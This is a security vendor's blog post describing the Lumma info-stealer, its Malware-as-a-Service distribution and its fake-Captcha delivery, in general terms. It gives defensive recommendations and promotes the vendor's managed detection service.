Lumma – The Emerging Malware-as-a-Service
Published:
In the evolving landscape of cyber threats, Lumma has emerged as a notable and concerning malware, especially with its increasing use through Malware-as-a-Service (MaaS). Lumma has emerged as a prominent and “trendy” malware, commonly spread through phishing and deceptive sites. It primarily targets sensitive data like passwords, credit card numbers, and account credentials. In this blog post, we will uncover more about Lumma.
What is Lumma malware
Lumma is an information stealer (info stealer) malware, highly specialized in locating and extracting personal and financial data. It functions by infiltrating a system and sending extracted information to an external server, often controlled by cyber criminals. The malware has been around for a while but recently gained attention due to its rise in both frequency and the number of reported incidents.
Why is Lumma on the rise?
Several factors contribute to Lumma’s growing popularity among threat actors:
Affordability and accessibility: MaaS offers a low-cost entry point for cyber criminals, making sophisticated malware tools like Lumma accessible to anyone with malicious intent.
Simplicity and scalability: Lumma’s configuration is user-friendly, and the attacks require minimal technical skill, allowing perpetrators to “cast a wide net” and indiscriminately target a broad audience.
Effective data collection: Once deployed, Lumma performs a single, high-impact scan of the infected system, capturing passwords, browser data, and cryptocurrency wallet information, particularly from Google Chrome databases.
The MaaS model: making malware accessible
Lumma is commercially available through Malware-as-a-Service platforms, which allows cybercriminals to purchase, configure, and deploy it with ease. MaaS operates across varying levels of sophistication and accessibility, often on dark web forums or specialized marketplaces, many of which are based on Russian-speaking platforms like Telegram. This approach has made it more accessible to a wider audience, driving down costs and increasing scalability, which in turn has made these attacks more common and impactful.
The tactics and targets of Lumma malware
Lumma’s popularity with MaaS platforms has diversified the types of attackers who utilize it. While initially non-targeted, Lumma is often the first step in broader attacks, used to steal credentials that can be sold or further exploited. Common targets range from general users to high-value targets like executives, where the goal is often to gain access to sensitive corporate data.
Examples of Lumma in action
Lumma typically deploys through websites requiring users to verify they are “human”, often tricking them into executing malicious commands under the guise of Captcha verification. In one recent incident, a user was lured through a fake football streaming site to run commands that downloaded Lumma, compromising sensitive data immediately. Cyber security experts in the SamurAI Security Operations Center have created a Sigma rule for detecting Lumma stealer which can be found on our Github here.
How to protect against Lumma
Employing a Security Operations Center (SOC): A well-functioning SOC can quickly identify suspicious behavior, even from legitimate applications. When an unfamiliar program tries to access stored passwords in Chrome or other sensitive data, it raises red flags, allowing for rapid incident response.
User education: Educating employees on safe online practices, such as avoiding suspicious links or untrusted websites, can reduce the likelihood of an accidental malware installation.
Least privilege principle: By restricting administrative permissions, organizations can prevent unauthorized use of tools like PowerShell, which attackers commonly exploit.
Custom detection tools: At NTT Security, we leverage a custom detection tool designed to identify the specific patterns left behind by Lumma. This tool detects known indicators of compromise (IoCs), including server communication trails Lumma uses to relay stolen data back to its operators.
At NTT Security we are committed to helping businesses understand Lumma’s behavior and employing advanced detection tools to effectively protect themselves against this growing threat. Our SamurAI Managed Detection and Response (MDR) service is designed to help companies with expert security monitoring and detection, allowing them to focus on their core business activities.
Contact us to learn how we can help protect your business from Lumma malware.